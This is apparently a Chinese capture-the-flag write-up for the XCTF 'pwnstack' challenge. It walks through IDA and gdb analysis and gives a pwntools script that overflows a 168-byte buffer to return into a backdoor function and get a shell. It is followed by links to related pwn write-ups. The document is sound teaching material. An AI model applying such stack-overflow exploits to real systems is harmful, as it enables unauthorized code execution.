攻防世界pwn难度1
1.pwnstack
首先用IDA进行静态分析
可以看到有一个输入函数
后门函数,直接执行system()
记下函数地址
0x400762
gdb动态分析
走到read函数的位置输入后查看栈
b8 - 10 = 168
需要输入168个字节,再用backdoor的地址覆盖main+34的返回地址即可
编写脚本
from pwn import *
context(log_level='debug',arch='i386', os='linux')
io = remote('地址', 端口)padding = 168
pause()return_addr = 0x400762
payload = b'a'* padding + p64(return_addr)
delimiter = 'that??'
io.sendlineafter(delimiter, payload)
io.interactive()
最后 cat flag
攻防世界pwn难度1相关推荐
- 攻防世界(Pwn) forgot---栈溢出;(方法二)
攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...
- 攻防世界(Pwn) forgot---栈溢出;(方法一)
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
- [攻防世界 pwn]——pwn1(内涵peak小知识)
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
- [攻防世界 pwn]——实时数据监测
[攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...
- [攻防世界 pwn]——monkey
[攻防世界 pwn]--monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题.checksec没什么大不了的 但是再IDA中就懵了,好大呀.好多 ...
- [攻防世界 pwn]——反应釜开关控制
[攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...
- [攻防世界 pwn]——pwn-100
[攻防世界 pwn]--pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符 ...
- [攻防世界 pwn]——pwn-200
[攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...
- [攻防世界 pwn]——welpwn
[攻防世界 pwn]--welpwn 题目地址: https://adworld.xctf.org.cn/ 题目: 我只能说这道题太巧了, 实在太巧了.我想出来一个名词叫做栈连接 还是先checkse ...
最新文章
- 搭建Jasig CAS中央认证服务实现单点登录——搭建Tomcat并实现SSL安全连接
- SyntaxError: invalid syntax的问题原因和解决办法
- RDIFramework.NET ━ .NET快速信息化系统开发框架 V3.0 版新增系统参数管理
- HDU 6044 Limited Permutation(2017多校)【计数 快速读入挂 线性逆元】
- ping不通www.baidu.com,但可以访问www.baidu.com网页
- 【Qt】2D绘图之复合模式
- 20w7珠led驱动电源电路图_LED驱动电源:用TL431做的几个恒流电路分享!
- Mysql varchar 字节长度
- bootstrap-表单
- 【JAVA 第四章 流程控制语句】课后习题 二维坐标距离 三角形判断等
- 干点大事!“覆盖25万人的AI资源对接平台”发布,找人、找技术不再难!
- VS2013打开项目出现未找到与约束contractname 匹配的导出的错误
- XP安全防护国际评测 360小红伞卡巴排行前三
- 俄罗斯黑客太疯狂,破解赌场算法,全球捞钱……
- C#修改Windows系统时间
- html5 苹果 dock,基于JQuery模仿苹果桌面的Dock效果(初级版)
- 删除vlan 华为s5720_华为S5720系列交换机快速配置手册常用命令 - Late Winter
- 扭蛋机html源码,jQuery动画扭蛋机抽奖代码
- 看网易云公开课代码性能开发有感,怎样提高代码的性能
- echart报错echarts/lib/visual/dataColor in ./node_modules/echarts-liquidfill/src/liquidFill.js